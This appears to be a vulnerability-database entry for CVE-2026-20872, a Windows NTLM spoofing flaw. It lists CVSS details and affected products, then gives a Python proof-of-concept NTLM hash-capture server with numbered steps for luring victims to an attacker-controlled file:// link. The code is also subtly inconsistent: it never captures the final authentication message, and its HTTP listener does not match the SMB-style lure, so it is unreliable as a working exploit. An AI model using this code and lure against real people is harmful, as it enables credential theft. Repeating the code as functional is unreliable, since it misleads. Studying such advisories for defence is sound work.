Security Vulnerability Report
CVE-2026-20872 CVSS 6.5 MEDIUM


Published: 2026-01-13 18:16:17
Last Modified: 2026-03-27 21:17:02

Description

External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:* - VULNERABLE
All versions of Windows 10
All versions of Windows 11
Windows Server 2016
Windows Server 2019
Windows Server 2022
Windows systems with NTLM authentication enabled

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-20872 PoC - NTLM path-control spoofing attack
# This PoC demonstrates how the Windows NTLM path-control vulnerability can be used for a spoofing attack
import http.server
import socketserver
import os
import sys
from urllib.parse import urlparse


class NTLMCaptureHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Log the connection details
        client_ip = self.client_address[0]
        print(f"[*] Connection from: {client_ip}")

        # Check for an NTLM Authorization header
        auth_header = self.headers.get('Authorization', '')
        if auth_header.startswith('NTLM'):
            # Extract the NTLM Negotiate message
            ntlm_msg = auth_header[5:].strip()
            print(f"[*] NTLM Negotiate message received from {client_ip}")

            # Send the NTLM Challenge
            self.send_response(401)
            self.send_header('WWW-Authenticate', 'NTLM TlRMTVNTUAACAAAAAAAAACgAAAABggAAU3J2Tm93Um9yawAAAAAAAAAAAAA=')
            self.end_headers()
            self.wfile.write(b'Unauthorized')
        else:
            # Send the NTLM challenge request
            self.send_response(401)
            self.send_header('WWW-Authenticate', 'NTLM')
            self.send_header('Connection', 'close')
            self.send_header('Content-Type', 'text/html')
            self.end_headers()
            response = b'<html><body>401 Unauthorized</body></html>'
            self.wfile.write(response)

    def log_message(self, format, *args):
        # Custom log output
        print(f"[HTTP] {format % args}")


def start_evil_server(port=8080):
    """Start the malicious server to capture NTLM authentication"""
    print(f"[*] Starting NTLM capture server on port {port}")
    print(f"[*] Waiting for victim connections...")
    with socketserver.TCPServer(("", port), NTLMCaptureHandler) as httpd:
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            print("\n[!] Server stopped")
            sys.exit(0)


if __name__ == "__main__":
    # The attacker starts the malicious server
    # NTLM authentication is triggered when the victim visits an attacker-controlled URL
    # For example: file://attacker-server/share/path
    start_evil_server()

# Exploitation steps:
# 1. The attacker deploys the malicious HTTP server above
# 2. Craft a link containing a malicious file path, such as file://attacker-ip/malicious
# 3. Lure the victim into visiting the link
# 4. Windows attempts to access the path using NTLM authentication
# 5. The attacker captures the Net-NTLM hash for replay attacks or cracking
```

References

Raw JSON Data
